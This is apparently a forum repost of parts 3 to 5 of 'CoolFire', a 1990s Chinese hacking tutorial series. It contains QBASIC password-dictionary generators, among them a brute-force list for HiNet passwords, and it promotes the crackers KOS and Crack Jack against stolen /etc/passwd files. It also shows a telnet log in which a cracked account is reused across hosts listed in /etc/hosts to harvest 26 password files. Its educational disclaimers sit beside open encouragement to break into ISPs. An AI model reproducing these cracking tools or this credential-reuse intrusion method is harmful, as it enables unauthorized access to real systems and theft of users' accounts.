 [1] apple [2] guest [3] james [4] superman [5] password
 
 OK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧 !
 我们首先这样说明: 母音在英文\r 上有 : A E I O U 这五个, 所有的英文单字都会有这些母音(有些没有的可能是专有名词或缩写), 也有可能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
 再来就是比较每个字的开头, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是两个子音再接一个母音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph, st, sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e;est; ord; ard; ls; es; s...等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了 !!
 我大略写一个简单的, 其它大家自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧 !!
 
 底下就是该程式片段, 执行後会产生 MyDic.Txt 档, 大小为: 22,096 Bytes 共有 3120个字的字典!!
 
 --------------- MakeDic.BAS Start Here
 -------------------------------------------------------------------------------
 --------
 DIM FirstWord$(20)
 DIM MotherWord$(13)
 DIM LastWord$(12)
 
 DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
 "t", "p", "k" , "f", "m", "n", "b","k"
 DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
 DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"
 
 FOR I = 1 TO 20
 READ FirstWord$(I)
 PRINT FirstWord$(I)
 NEXT I
 
 FOR I = 1 TO 13
 READ MotherWord$(I)
 NEXT I
 
 FOR I = 1 TO 12
 READ LastWord$(I)
 NEXT I
 
 OPEN "MyDic.txt" FOR OUTPUT AS #1
 
 FOR I = 1 TO 20
 FOR J = 1 TO 13
 FOR K = 1 TO 12
 PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
 NEXT K
 NEXT J
 NEXT I
 
 CLOSE : END
 --------------- Cut Here, End of MakeDic.BAS
 -------------------------------------------------------------------------------
 -
 
 当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如:
 子音+母音+子音+母音+子音, 作出来的字典档会很吓人喔 !! 这一个部份就讲到这里了 ! 如果你有很棒的字典产生程式,写好了请 Mail 一份给我喔 !! 如果可以的话请说明是否可以公布在我的 W3 上让其它人下载 !!还是你只是要给我 ?!
 
 希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看,如果有相同的请赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗 ??? 咖啡业者...... ISP
 们.... 教教你们的使用者吧..... 唉~~~~
 
 
 **** 後语 ****
 
 我们的首页感谢大家的支持, 现在人数已经到达 2,000 了, 这是一个地下站(未对外正式公布) 很棒的一个数字, 在与其它工作室人员研究之後, 暂时不对外公布站址, 如果你是 "误闯"到本站来的! 我们欢迎你的加入, 但目前尚不考虑对外公布站址, 请您在告诉你的朋友有这麽一个站存在的时候,请他不要随便告诉别人 (请只告诉你信赖的朋友; 或对电脑有一份特别狂热的人, 我们都欢迎他们的加入),我们目前所采用的方式将是开放式的! 对首页部份暂时不以密码方式处理.
 
 ** 不要 Crack 这个首页的 ISP!!!! 否则 FETAG Sofeware's Hacking Page将会完全关闭, 再也不寻找其它的地方来放置, 希望给你的是使用电脑的 "知识", 不要利用它来夺取任何的 "权利",本首页著重的是教育, 而不是一　的教导攻击的方法, 希望大家对於政府机关 (org.tw) 或教育机构 (edu.tw)不要作任何的破坏!!还有我的 ISP......:D
 
 ------
 哇! 一份案子搞了好久, 都没时间维护网页了, 所以特别将维护的工作还给了 James,希望大家多多支持我们的园地, 我案子搞完後再跟大家谈谈我最近的实战故事! 虽然没时间写网页,但是还是会写一些文件给大家作为参考 !!
 
 ------
 再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上 (又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

白鹤 · 发表于 2005-7-22 22:06:23

如何破解系统(4) 这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !! 经过了上一次的实战, 该 ISP 已经灰头土脸, 当然也已经将被我揪出密码的 UserPassword 改掉了, 但是系统**部分还是没有多大的改进, 唉.... 有点伤心.这一次的内容主要在加强上次所说明的字典档部分, 因为我又想到另外一个方法可以快速的产生字典档,而且用这个方法产生的字典档更吓人; 当然还要跟大家介绍另一个好用的 Password Crack 工具,并加上最近的一些信件整理出来的 FAQ 等, 希望能在过年以前就将这一篇写好! 本次主题: 字典档的维护及更新 连接位址: 无 特别说明: 快点加强一下你的字典档吧 !! 不然怎麽破密码哩?! -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- **** 课程开始 **** 依我看, "字典" 这个讨论应该是谈不完的了, 因为有太多的方法了,但是为了维护你自身的权益, 自己的密码最好保管好, 我在前几天刚拿到 KOS 的时候, 拿她来跑一个 ISP 的 /etc/passwd 档案, 原先单单使用 Crack Jack 只找到 22 组的密码, 用了 KOS 加上 Crack Jack 居然共找到了88 组的密码, 还好该 ISP 不像高-NET 一样是属於 "时数收费" 的收费方式, 不然可能有许多的User 自己当了冤大头都还浑然不知. 所以这个讨论还是免不了的, 如果你觉得你不需要这些知识,请跳过去吧!! 上次的字典档讨论, 我写了一个简短的程式出来产生了 3120 组的密码,但是这些密码并不一定是一个 "字", 也就是说产生完全合乎我们所限定的 "法则", 但却不一定是一个已存在的字, 所以如果要产生一个 "高效率" 的字典档, 使用上次所说的那种方式就不是一个很好的方法了. 以上次所写的程式 MAKEDIC.BAS 所产生的 MyDic.txt 为例, 其中的 braard clale cleoe dgeiingdgeie.......等字就不是很 "正常" 的字, 当然也有可能是某人的密码, 但其机率小之又小. 这次所写的程式名称为 TXT2DIC.BAS, 我们还是先使用大家都熟悉的 QBASIC 来写,以方便日後的修改, 先说明一下原理: 这个程式是一个自动产生字典档的程式, 我们是经由给程式一个"文字档", 然後由程式自该文字档中 "抽取出" 字出来, 这些文字档必需是英文的文字档,如果使用中文的文字档的话程式跑起来会有问题, 英文文字档的取得可由英文版软体的 Readme档或网路上的英文版学术论文或其它的来源. 当然有可能在文件中会出现像 <a href="http://www.showtower.com.tw/~fetag" target="_blank"><a href="http://www.showtower.com.tw/~fetag" target="_blank">www.showtower.com.tw/~fetag</a></a> 的字眼,我们总不能把它也列入字典档中吧! 所以程式中有一点小小的设计, 就是该字若字母数大於 10 则不列入考虑,我们也可以使用上一次所介绍的子音+母音... 等的公式来作检查法, 但是我没有太多的时间作这些事,留待有空的人来写吧!! 底下就是该程式原始码, 请各位以 QBASIC 来启动并执行它: --------------- Txt2Dic.BAS Start Here ------------------------------------------------------------------------------- -------- CLS PRINT "Txt2Dic Version 0.1B (C)1997 By CoolFire ReChange: CoolFire" PRINT "[Source Released, For Changer, Add Your Name in ReChange Field]" PRINT LINE INPUT "Text File Name: "; TxtFile$ LINE INPUT "Output Dic Name: "; DicFile$ OPEN TxtFile$ FOR INPUT AS #1 OPEN "TMPFILE1.$$$" FOR OUTPUT AS #2 REM Filter for text file ReInput: IF EOF(1) THEN GOTO EndFile LINE INPUT #1, L$ ReTry: L$ = LTRIM$(L$) L$ = RTRIM$(L$) TmpValue = INSTR(L$, " ") IF TmpValue 0 THEN DicTxt$ = LEFT$(L$, TmpValue - 1) PRINT #2, DicTxt$ LOCATE 7, 1: PRINT "Step 1, Add word : "; DicTxt$; STRING$(10, " ") L$ = RIGHT$(L$, LEN(L$) - TmpValue) GOTO ReTry ELSE GOTO ReInput END IF END EndFile: CLOSE REM Filter for special chapter and lower-case the word OPEN "TMPFILE1.$$$" FOR INPUT AS #1 OPEN DicFile$ FOR OUTPUT AS #2 Special$ = "-,.:?*()/_" + CHR$(34) DO LINE INPUT #1, L$ FOR I = 1 TO 13 SP$ = MID$(Special$, I, 1) TmpValue = INSTR(L$, SP$) IF TmpValue 0 THEN LOCATE 8, 1: PRINT "Remode special word :"; L$; STRING$(10, " ") L$ = "" END IF NEXT I IF L$ "" THEN L$ = LCASE$(L$) PRINT #2, L$ END IF LOOP UNTIL EOF(1) CLOSE KILL "TMPFILE1.$$$" END --------------- Cut Here, End of Txt2Dic.BAS ------------------------------------------------------------------------------- - 我只花了几分钟写这个程式, 因为时间紧迫 (为了在过年前将此篇送出),所以有些考虑到的地方都没有作修改, 在这里再作些说明: 这个程式的第一个部份为分解字串, 将碰到的 CHR$(20) 也就是空白分离出来, 这是分解一句话中字与字最简单的方法,并且会将分解出来的字存在一个暂存档中, 作为第二部分的使用. 第二部分将暂存档读入, 并过滤非正常的字母出现,我只让它过滤了十三种特殊字如: -,.:?*()/_" 等, 当然如果你可视需要再作删减的功能. 原本想要再写排序及过滤重覆字的功能, 但是这些功能不是那麽需要,因为在排序方面你可以使用电脑中 DOS 的 SORT 或 Crack Jack 的 JSort, 过滤重覆字也有 CoolFire 的 De-Sort可以使用, 所以就先在这里停住, 有心的读者可以自行修改, 修改完後也请传送一份给我,作为日後教学的参考之用, 或提供网友们分享. 仔细看一看这个程式还是有很多地方没有作修正, 或是没有作 Error Handle 等,但已经给各位原始程式了, 大家就试著修改看看吧! Qbaisc 是一个很简单的语言,只要你试试看就可以把这个程式改得很好了. 用这个程式试了一个文字档, 发现它找到的字都是一些很简单的字,当然跟你所给它的材料有很大的关系, 使用这个程式配合一个很棒的材料档, 应该可以作出一份很棒的字典档,希望大家可以好好的利用它. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- **** 新工具程式 Global KOS Krack (KOS) **** 记得从上次讲过 Crack Jack 之後好像就没有再讲过 Password Crack 的工具程式了,当然也跟最近没有甚麽好程式出现有关系, 像前一阵子风行的 Mail Bomb 最近也没有再见到改版,倒是出现了一些写得不怎麽样的 Bomb 程式, 了无新意, 我现在还是在用 KaBoom 3.0, 你呢 ?? 前几天无聊逛了一下国外的 Crack 站台, 意外的发现了一个叫作 KOS 的东西, 传回来试了一试果然不错,而且里面还包含了一个 3MB 多的字典档, 这对字典档中缺料的读者们肯定会有帮助的. KOS 是许多工具的集合, 由一些批次档对这些工具作了很棒的整合, 它必须与 Crack Jack一起使用才能运作, 平常我们在处里 Password Crack 时都需要考虑到第一个字母大写, 加数字, 字母大小写转换等等的工作, 都可以由 KOS 一手包办, 你只要取得 KOS, 就可以配合著 Crack Jack将以前单单使用 Jack 寻找的 /etc/passwd 再翻出来 Crack 看看, 保证你会体会到拥有 KOS的好处. 像前面所说的, 我将以前只找到 22 组密码的 /etc/passwd 重新跑过, KOS居然可以帮助我找出 88组的密码, 足可见 KOS 可以增强 Crack Jack 四倍的 Cracking 能力, 作者宣称 KOS 在 NT 上开了DOS 视窗就可以跑, 但是我以 NT 4.0 中文版及 Windows 95 (97 年版) 测试後还是因为Jack 无法在上面运作而停摆, 只好回到纯 DOS 模式下才能够使用, 但是 KOS还是能发挥它强大的功能, 唯一需要的就是一部速度快一点的机器, 当然还有时间也是必需的. 我使用 KOS + Crack Jack 在 Pentium-100 32MB RAM SCSI-II HDD 上跑一个/etc/passwd 档加上我的字典档 (passwd 档案大小为 197K, 字典档大小为 5.1MB),跑了四天都还没有完全跑完的情况, 就可以知道 KOS 尽了多大的努力在帮我们找出密码, 当然如果你的 /etc/passwd 只有几 K大小可能只消几个小时就可以全部跑完了!! 不过要找出 root 密码, 可能还是要靠点运气才行了.... KOS 的压缩档中还包含了 SHADOW.C 及 UNSHADOW.C 两个解 shadow 的程式, 可在 Unix主机上编译以取得被 shadow 过的 /etc/passwd, 在这里也顺便提出,网友们不要忘了顺便试试这两支程式. 想要知道哪里可以拿到 Global KOS Krack ?? 到我们的 Home Page 看看吧!! -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- **** CoolFire FAQ **** [Q1]请问一下你的letmein 2.0何时出来? [A1]因为最近实在是太忙了, 所以有很多的事情都没有办法依照预定的行程作完,所以最近也都不敢再多排订行程,看看最近首页更新的状况也应该知道我们实在是没有时间多作别的事了, 所以要先跟期待 LetMeIn 2.0 的人先说生抱歉, 但是我们的 Idea 还是在持续增加中,所以如果有空写 LetMeIn 2.0 的时候将会推出很棒的版本, 请再等等吧~~~ 这阵子先过了再说!! [Q2]请问一下letmein 1.0 的setup keys-要如何设定? 如果用 netterm 要找login name& passwd在letmein要怎样设定不断换行, 而不会文字一直加长? [A2] LetMeIn 1.0 已经有作一份中文的简易说明来补充原先说明档的不足,所以如果你对该软体有不清楚的地方请先阅读这个说明档之後再提出问题, NetMeIn 1.0 是在 NetTerm下作的测试,所以使用 NetTerm 配合 LetMeIn 应该不会有问题, 请再试试看! [Q3]请问 "最新之系统安全 mailliast" 要到那里去看? 还是要订阅? 如何订阅呢?是英文or 中文? [A3]原本想要在这次首页更新的时候加入一些 Mail List 订阅的连结点,但是因为时间太匆促所以没有作, 先跟各位说声抱歉了, 你可在国外的 Hacker 站找到,或是先订阅下面这一个List 来看看, 不过目前这类的 Mail List 都是英文的. 写到: Majordomo@ns2.rutgers.edu 标题: (空白不填) 内容: SUBSCRIBE www-security 你的 E-Mail 信箱 [Q4]为什麽 De-sort 不能用? Key In ..... 为什麽会这样?? C:\Program Files\LetMeIn>de-sort De-Sort V0.1 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN. This program will: [1] Delete reiteration word from a dictionary file [2] Write the new file to a temp file [3] Delete old dictionary file [4] Rename new dictionary file as old one's file name Dictionary file name: 1 {Now Start To Check} Some error found when program processing, Code= 53 De-Sort Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw FETAG Software Development Co: <a href="http://www.showtower.com.tw/~fetag" target="_blank">http://www.showtower.com.tw/~fetag</a> C:\Program Files\LetMeIn> [A4]出现 Error Code = 53 代表开档有问题, 你所输入的档名 '1' 这个档案可能不存在,你 应该检查看看这个档案是否存在於目前目录, 否则就应该给它目录名称, 其它的ErrorCode 可以参考 QuickBasic 或 Basic PDS 的书籍来查出错误发生的原因是甚麽! [Q5]小弟自从放寒假後,"高-Net"费用往上狂飙, 急起直追请问你有Crack 过 "高-Net"吗?? "高 - Net"的防备似乎蛮强的!我是你的忠实读者,你的作品coolhc-1,coolhc-2,cool-3,我都有努力钻研学习,但就是弄不到 etc/passwd, 不知是不是我资质太低 ~~#@$%烦请高 手帮忙弄到 etc/passwd Ps: coolhc-2,and coolhc-3 最後的那句(高-Net 还是除外)是说"高-Net"可以或不可以 Crack ,如果不可以就不用帮我Crack 了![A5]当然还是有漏洞, 我有稍微试过, 只要是新发现的 Bug,他们会很快的有人将漏洞补上,而且该 ISP 有许多的工作人员, 并且采用计时收费的方式, 所以就算你 Crack 了,也是将帐目算到别人头上, 有点缺德, 所以不需要 Crack 它, 大家不要申请它这个 ISP就好了! 不然还是请你看看系统安全的 Mail List 了解最新的系统安全消息!比它们快一步进入系统就可以了! 这个文章还是以教学为目的, 无法给你 ISP 的 /etc/passwd! [Q6]Hinet 密码 to Dic: 因为 Hinet 的密码格式是 1abcdefg 所以我就依照 coolhc-3的程式设计了这个东西! (0aaaaaaa ~ 9zzzzzzz) 希望会有用! 欢迎批评,指教,修改. --------------- HinetPas.BAS Start Here ------------------------------------------------------------------------------- -------- DIM No$(10) DIM Eng$(26) DIM LastWord$(26) DIM a$(26) DIM b$(26) DIM c$(26) DIM d$(26) DIM e$(26) DATA "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" FOR I = 1 TO 10 READ No$(I) PRINT No$(I) NEXT I FOR I = 1 TO 26 READ Eng$(I) NEXT I FOR I = 1 TO 26 READ LastWord$(I) NEXT I FOR I = 1 TO 26 READ a$(I) NEXT I FOR I = 1 TO 26 READ b$(I) NEXT I FOR I = 1 TO 26 READ c$(I) NEXT I FOR I = 1 TO 26 READ d$(I) NEXT I FOR I = 1 TO 26 READ e$(I) NEXT I OPEN "Hinetpas.txt" FOR OUTPUT AS #1 FOR I = 1 TO 10 FOR J = 1 TO 26 FOR k = 1 TO 26 FOR l = 1 TO 26 FOR m = 1 TO 26 FOR n = 1 TO 26 FOR o = 1 TO 26 FOR p = 1 TO 26 PRINT #1, No$(I) + Eng$(J) + LastWord$(k) + a$(l) + b$(m) + c$(n) + d$(o) + e$(p) NEXT p NEXT o NEXT n NEXT m NEXT l NEXT k NEXT J NEXT I CLOSE : END --------------- Cut Here, End of HiNetPas.BAS

白鹤 · 发表于 2005-7-22 22:07:03

- [A6]谢谢这位网友, 你的 For... Next 的 Deep 实在太长了,不得不将格式改变一下才能放 进文章中. 也希望有更多人的集思, 写出更多字的字典档! [Q7]我用pass2dic时没辨法转成文字档ㄟ, 会有错误说(以下的讯息)请问要如何更正... Some error found when program processing, Code= 75 [A7]试过了, 都没有办法产生这样的 Code, 所以请看看磁碟是否防写, 或参考 BasicPDS的 书籍寻找该 Error Code 的解释或说明. [Q8]请问一下，passwd除了会放在/etc/之下，还有可能会放在哪儿？ [A8]有有可能是 /etc/ 目录中的 passwd.??? 或 shadow 或 shadow.??? 都有可能. [Q9]我有在你的HOMEPAGE DOWNLOAD CoolHC#1.txt 里面有些步骤不懂如:1.(首先要先连上某 一台你已经有帐号的 Telnet 主机.....)? 是不是在刚上HINET时出现拨号视窗下选=3 进入TELNET?还是SELECT=1 进入PPP後用WS-FTP 找寻etc/pass 的档案? 2.(我有在你的HOMEPAGE DOWNLOAD A letme.. of program 有点像claymore,不过不会使用 Q.他不把所有的设定都用好後按"START BF"在 DELAY 未结束时,把游标移到要 CRACK 的 PASSWORD BOX?但是出现了很长的数字也没有 CRACK? 3.(我在一些国外的WAREZ 看过有关HACK UNIX的文件里有写都包函一段 "C"语言,是不是能在 TELNET 下输入执行程式就会自动CHECK PASSWORD?是不是你在 "COOLHC#1.TXT里有保留一段进入 SYSTEM 的程式? 4.(有时用WS-FTP下找PASSWORD时,不是隐藏就是没用的档案,是否有方法让隐藏档显示? 5.你有一个AUTOHACK是不是一种利用拨电话的方式进入主机?(有点像电影中的战争游戏)? 6.像SHADOW.C的档案要如何组译成执行档? [A9]好多的问题喔, 我一个一个回答吧! 1.LetMeIn! 是用在 PPP 模式, 不是 Telnet模式, 你 先连上 PPP 模式後开启 NetTerm 然後开 LetMeIn! 在 LetMeIn! 中作好设定按下Start键後再回到 NetTerm 等待自动输入. 2.Telnet 可在你的 Win95 中找到, 只要连上 PPP模式就可以使用, 你也可以使用 NetTerm 之类的软体, 不一定要在连线时选 Telnet模式.3. LetMeIn! 需要在启动後回到 Telnet 软体才会自动 Crack 4.AutoHack是自动拨号寻找有连接数据机的电话号码, 对 InterNet 来说可能没有用出吧! 5.用这一期 CoolHC所说的 KOS 中有 Shadow.c 可以试试. 6.用 cc 指令可以编译, 但要看你的 ISP有没有提供. [Q10]请问我抓到的一些字典档 .Z 格式, 为何无法用 uncompress 解开,解开後都是一些乱码 [A10]如果你用 Windows 或是 Win95 的话, 试著安装 WinZip 应该就可以解开了 !! [Q11]请问能够提供更多的crack document吗(能有中文吗,英文的有点吃力说)或是介绍更多的 Crack Tools. [A11] CoolHC 就是中文的呀! 但是其它的当然只有英文的可以看罗,现在有没有多少人投入在 写这样的东西呀~~ 本期的新工具就有介绍 KOS,如果下此有好工具也会一并提出来介绍,若有网友使用的心得也可以传给我放在 Home Page 上! **** 後语 **** CoolFire 改 E-Mail 了! 因为 HotMail 都要用 WWW 浏览器才能收信, 有点火大,所以这次在 CyberSpace 申请了一个新的帐号, 请写信给我的时候不要投错信箱了喔~~~~ E-Mail: coolfire@cyberspace.org 我们的首页感谢大家的支持, 现在人数已经超过 2,600 了, 这是一个地下站(未对外正式公布) 很棒的一个数字, 在与其它工作室人员研究之後, 暂时不对外公布站址, 如果你是 "误闯"到本 站来的! 我们欢迎你的加入, 但目前尚不考虑对外公布站址,请您在告诉你的朋友有这麽一个站 存在的时候, 请他不要随便告诉别人 (请只告诉你信赖的朋友;或对电脑有一份特别狂热的人,我们都欢迎他们的加入), 我们目前所采用的方式将是开放式的!对首页部份暂时不以密码方式处理. ** 不要 Crack 这个首页的 ISP!!!! 否则 FETAG Sofeware's Hacking Page将会完全关闭, 再 也不寻找其它的地方来放置, 希望给你的是使用电脑的 "知识",不要利用它来夺取任何的"权利", 本首页著重的是教育, 而不是一　的教导攻击的方法, 希望大家对於政府机关(org.tw) 或教育机构 (edu.tw) 不要作任何的破坏!! 还有我的 ISP......:D ------ 首页更新部分因为最近都太忙了, 所以每个人都没有时间写, 希望各位见谅, 这次特别把CoolHC的内容增加, 希望可以让你学到更多, 如果有人有写类似这样的文章, 请寄给我一份, 我也会将它放到首页上的~~~:)

白鹤 · 发表于 2005-7-22 22:08:34

如何破解系统(5) **** 课程开始 **** 首先说明的是, 这个网路提供者的服务项目,包含了拨接及传真还有帮其它业者架设网路等, 也就是说如果我们能够善用他们的系统就可以免费传真罗 ?? 哇哩... 国际传真耶,这间公司不就亏大了!!!!!所以马赛克处理是必要的, 不过这次的课程不是说明这个 ISP 够大,而是我们如何利用一组已经破解的密码来入侵其它与其相连的主机, 这点是比较重要的!! 大家可能早就已经知道, 在 Unix 系统中 /etc 目录下的 hosts 档案的作用了,我们今天就来谈谈, 知道的人跳过去吧!! 如果使用 Windoz 95 的人, 也可以看看在你 95的系统目录中也有一个这样子的档案, 他是长得像这个样子的: 127.0.0.1 localhost FETAG , 表示 127.0.0.1 为LocalHost 也就是 FETAG 的电脑, 所以我们要找与该 Unix 有 "直接关系" 的主机可以由这个地方找到. 找到这些主机有甚麽用呀 ?? 继然你已经有了一个主机的密码,当然其它的主机也可能会有相同的User 在其它的主机上用同样的帐号, 而且依据经验来说,他们在其它主机上的密码通常都跟你目前所拥有的这一份是一样的, 也就是你可以用同样的一组密码游走於其它的主机!! 以下示范的这个例子就是啦!! www:/etc$ telnet Superman.com.tw Trying 222.111.111.111... Connected to Superman.com.tw. Escape character is '^]'. Linux 1.2.8 (Superman.Superman.com.tw) (ttyp0) (甚麽烂公司, 新版系统的 Bug 少多了, 还不更新~~~) Superman login: amywang Password: (用你所知道的密码进入) Linux 1.2.8. (POSIX). You have new mail. (不要偷看人家的信喔) Superman:~$ cd /etc Superman:/etc$ cat hosts (直接深入今天的主题) # For loopbacking. 127.0.0.1 localhost 222.111.247.1 router 222.111.247.2 abcdf01.tpfoo.Superman.com.tw abcdf01 f01 222.111.247.3 abcdf02.tpfoo.Superman.com.tw abcdf02 f02 222.111.247.4 abcdf03.tpfoo.Superman.com.tw abcdf03 f03 222.111.247.5 abcdf04.tpfoo.Superman.com.tw abcdf04 f04 207.121.0.15 abcdhk1.planet.com.hk abcdhk1 hk1 222.111.248.2 abcdf11.tcfoo.Superman.com.tw abcdf11 f11 222.111.248.3 abcdf12.tcfoo.Superman.com.tw abcdf12 f12 222.111.248.4 abcdf13.tcfoo.Superman.com.tw abcdf13 f13 222.111.248.131 abcdf21.ksfoo.Superman.com.tw abcdf21 f21 222.111.248.132 abcdf22.ksfoo.Superman.com.tw abcdf22 f22 222.111.248.133 abcdf23.ksfoo.Superman.com.tw abcdf23 f23 222.111.248.134 abcdf24.ksfoo.Superman.com.tw abcdf24 f24 222.111.247.33 abcdf01-s1.Superman.com.tw abcdf01-s1 f01-s1 222.111.247.33 abcdf02-s1.Superman.com.tw abcdf02-s1 f02-s1 222.111.247.34 abcdts2-s2.Superman.com.tw abcdts2-s1 ts2-s1 222.111.247.193 abcdf11-s1.Superman.com.tw abcdf11-s1 f11-s1 222.111.247.193 abcdf12-s1.Superman.com.tw abcdf12-s1 f12-s1 222.111.247.194 abcdts1-s1.Superman.com.tw abcdts1-s1 ts1-s1 222.111.247.73 abcdf21-s1.Superman.com.tw abcdf21-s1 f21-s1 222.111.247.197 abcdf22-s1.Superman.com.tw abcdf22-s1 f22-s1 222.111.247.198 abcdts1-s2.Superman.com.tw abcdts1-s2 ts1-s2 222.111.247.201 abcdus1-s1.Superman.com.tw abcdus1-s1 us1-s1 222.111.247.77 abcdus2-s1.Superman.com.tw abcdus2-s1 us2-s1 222.111.247.78 abcdts1-s3.Superman.com.tw abcdts1-s3 ts1-s3 222.111.247.133 abcdts1-l0.Superman.com.tw abcdts1-l0 ts1-l0 222.111.248.10 abcdts2-l0.Superman.com.tw abcdts2-l0 ts2-l0 #206.222.170.2 abcdus1.Superman.com.tw abcdus1 us1 #206.222.170.3 abcdus2.Superman.com.tw abcdus2 us2 206.222.170.4 abcdus3.Superman.com.tw abcdus3 us3 206.222.170.5 abcdus4.Superman.com.tw abcdus4 us4 206.222.170.7 abcdus1+.Superman.com.tw abcdus1+ us1+ us1 206.222.170.6 abcdus2+.Superman.com.tw abcdus2+ us2+ us2 222.111.247.131 linux01.Superman.com.tw linux01 x01 222.111.247.135 linux03.Superman.com.tw linux03 222.111.247.151 linux04.Superman.com.tw linux04 x04 222.111.247.132 linux02-l0.Superman.com.tw linux02 x02 222.111.111.111 Superman.Superman.com.tw Superman 222.111.27.153 pc3.Superman.com.tw abcdpc3 pc3 222.111.27.152 pc2.Superman.com.tw abcdpc2 pc2 222.111.27.147 brian.Superman.com.tw brian brian 222.111.27.148 linuxpc.Superman.com.tw linuxpc hsliao 220.65.11.1 knet01 203.127.230.243 fooServer.warpdrive.com.sg sgp02 # End of hosts (我已经尽量在马赛克了!! 如果有没有马赛克完全的地方, 请该网路业者见谅) (因为是 Telnet LogFile 直接收录的嘛~~ 唉.. 谁叫你的系统这麽脆弱~~) Superman:/etc$ telnet 220.65.11.1 Trying 210.65.33.2... Connected to 210.65.33.2. Escape character is '^]'. Linux 1.2.8 (snet01) (ttyp2) knet01 login: amywang Password: Linux 1.2.8. (KNET01). You have new mail. (进来了! 就是这样啦!!!!!!) 用了这种方法对该主机所连接的各点作测试,找到了一个可以使用所有主机的帐号及密码档案, 我用这个帐号抓了 26 台主机的 /etc/passwd, 现在我的机器还在使用 CJack 对这 26个密码档解码中, 如果有更进一步的消息, 我们会在下一篇的时候一并讨论,当然这个方法不仅适用於这间公司, 对其它的主机也都适用, 这间公司的规模应算不小了, 台湾; 香港; 日本都有分公司的样子,不过也都.... 呵~ 以上就是 hosts 档的妙用了!! 可能在此篇发表之後大家都用 DNS 了, 而不再编辑 hosts档了~~~ 不过这个档案也可以锁起来呀~~ 限定只有 root 可以用嘛! 反正一些烂 ISP 不是都这样, 一有安全顾虑就限定使用者的使用... 老套了啦!! 你还是会有其它的漏洞的... Linux 1.2.8 哈哈~~~多的是漏洞哩!!!!就算你把 hosts 也锁起来, passwd 也 shadow..还是有一大堆的地方是欢迎大家进入的~~~ 嗯.. 没有挑衅的意思啦~~ 各位亲爱的网路提供者... 请将您的系统加锁,以免有任何不测. 上次我们说的那个 ISP (WWW Server 有漏洞的那个), 这次已经将 root 的密码改掉了,但是还是留下许多 User 的密码没有改, Password 档也没有作任何的保护, 对於这样的业者, 哪一家公司的 HomePage 敢放在上面呢 ?? 被人乱改一通不是破坏了公司的形像吗 ?? -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- **** 又是字典档 **** 这次字典档的部份不再多谈了, 讲讲上一次的一点漏失,由於上次写出来的程式太多地方没有先作考虑, 所以用起来怪怪的 !! 再加上很多的功能没有加上的关系,有很多网友反映出来的问题多在自己操作上的错误, 呵~~ 怪写程式的人没有作好一些检查的动作嘛~~ 所以 CoolFire 决定将上次那个鸟程式重新写过, 配合排序及检查重覆的功能来使用,预计由今天晚上开始动工写出字典档的产生器, 这样才对各位网友们有个交待, 喝呵...不过网友们别抱著太大的希望, 因为 James 的 LetMeIn! 2.0 也还在大家的期盼下久久未见,每天加班的他也实在没甚麽时间,CoolFire 能在甚麽时候写好, 也是未知数. 不过请各位 Mail给我你对此字典档产生器的意见, 还有你希望它能在甚麽作业系统下动作 ?? DOS ?? Windoz ?? 